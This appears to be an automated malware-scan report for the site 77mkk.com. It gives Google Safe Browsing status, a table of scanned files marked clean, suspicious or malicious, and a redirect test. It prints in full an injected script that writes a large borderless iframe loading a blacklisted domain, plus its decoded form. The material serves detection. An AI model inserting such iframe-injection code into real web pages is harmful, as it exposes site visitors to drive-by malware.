Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=77mkk.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://www.77mkk.com/ | 200 OK Content-Length: 47068 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: yazhousetu.77mkk.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>ï¼·ï¼·ï¼·ï¼ï¼ï¼©ï¼´ï¼¡ï¼¯ï¼ï¼ï¼ï¼ï¼£ï¼¯ï¼ ï¼·ï¼·ï¼·ï¼ï¼ï¼ï¼ï¼ï¼©ï¼ï¼£ï¼¯ï¼ ï¼·ï¼·ï¼·ï¼ï¼ï¼ï¼ï¼°ï¼¡ï¼¯ï¼ï¼£ï¼¯ï¼ XXXï¼ï¼ï¼ï¼ï¼£ï¼¯ ...[4345 bytes skipped]... | ||
http://www.77mkk.com/static/js/common.js?UwO | 200 OK Content-Length: 63412 Content-Type: application/javascript | clean |
http://www.77mkk.com/js.js | 200 OK Content-Length: 293 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: 7e8k.com url = new Array();
url[0] = "http://7e8k.com/p/"; url[1] = "http://7e8k.com/p/"; i = Math.random() * url.length; i = Math.floor(i); document.writeln("<IFRAME border=0 name=I1 align=center marginWidth=0 src=\'" + url[i] +"\' frameBorder=0 width='100%' scrolling=no height=4000></IFRAME>"); Decoded script: <IFRAME border=0 name=I1 align=center marginWidth=0 src='http://7e8k.com/p/' frameBorder=0 width='100%' scrolling=no height=4000></IFRAME> | ||
http://www.77mkk.com/static/js/forum.js?UwO | 200 OK Content-Length: 22844 Content-Type: application/javascript | clean |
http://www.77mkk.com/static/js/logging.js?UwO | 200 OK Content-Length: 603 Content-Type: application/javascript | clean |
http://www.77mkk.com/home.php?mod=misc&ac=sendmail&rand=1406925255 | 200 OK Content-Length: 0 Content-Type: text/javascript | clean |
http://discuz.gtimg.cn/cloud/scripts/discuz_tips.js?v=1 | 200 OK Content-Length: 6173 Content-Type: application/x-javascript | clean |
http://www.77mkk.com/tj.js | 200 OK Content-Length: 365 Content-Type: application/javascript | clean |
http://www.77mkk.com/member.php?mod=register | 200 OK Content-Length: 11825 Content-Type: text/html | clean |
http://www.77mkk.com/home.php?mod=misc&ac=sendmail&rand=1406925265 | 200 OK Content-Length: 0 Content-Type: text/javascript | clean |
http://www.77mkk.com/search.php?mod=forum&srchtxt=%E6%B4%BB%E5%8A%A8&formhash=3a2705c9&searchsubmit=true&source=hotsearch | 200 OK Content-Length: 2644 Content-Type: text/html | clean |
http://www.77mkk.com/test404page.js | 404 Not Found Content-Length: 1312 Content-Type: text/html | clean |
http://www.77mkk.com/search.php?mod=forum&srchtxt=%E4%BA%A4%E5%8F%8B&formhash=3a2705c9&searchsubmit=true&source=hotsearch | 200 OK Content-Length: 2644 Content-Type: text/html | clean |
http://www.77mkk.com/search.php?mod=forum&srchtxt=discuz&formhash=3a2705c9&searchsubmit=true&source=hotsearch | 200 OK Content-Length: 2644 Content-Type: text/html | clean |
http://www.77mkk.com/archiver/ | 200 OK Content-Length: 6039 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 77mkk.com
Result:
GET / HTTP/1.1
Host: 77mkk.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: 77mkk.com
Referer: http://www.google.com/search?q=77mkk.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: 77mkk.com
Referer: http://www.google.com/search?q=77mkk.com
Result:
The result is similar to the first query. There are no suspicious redirects found.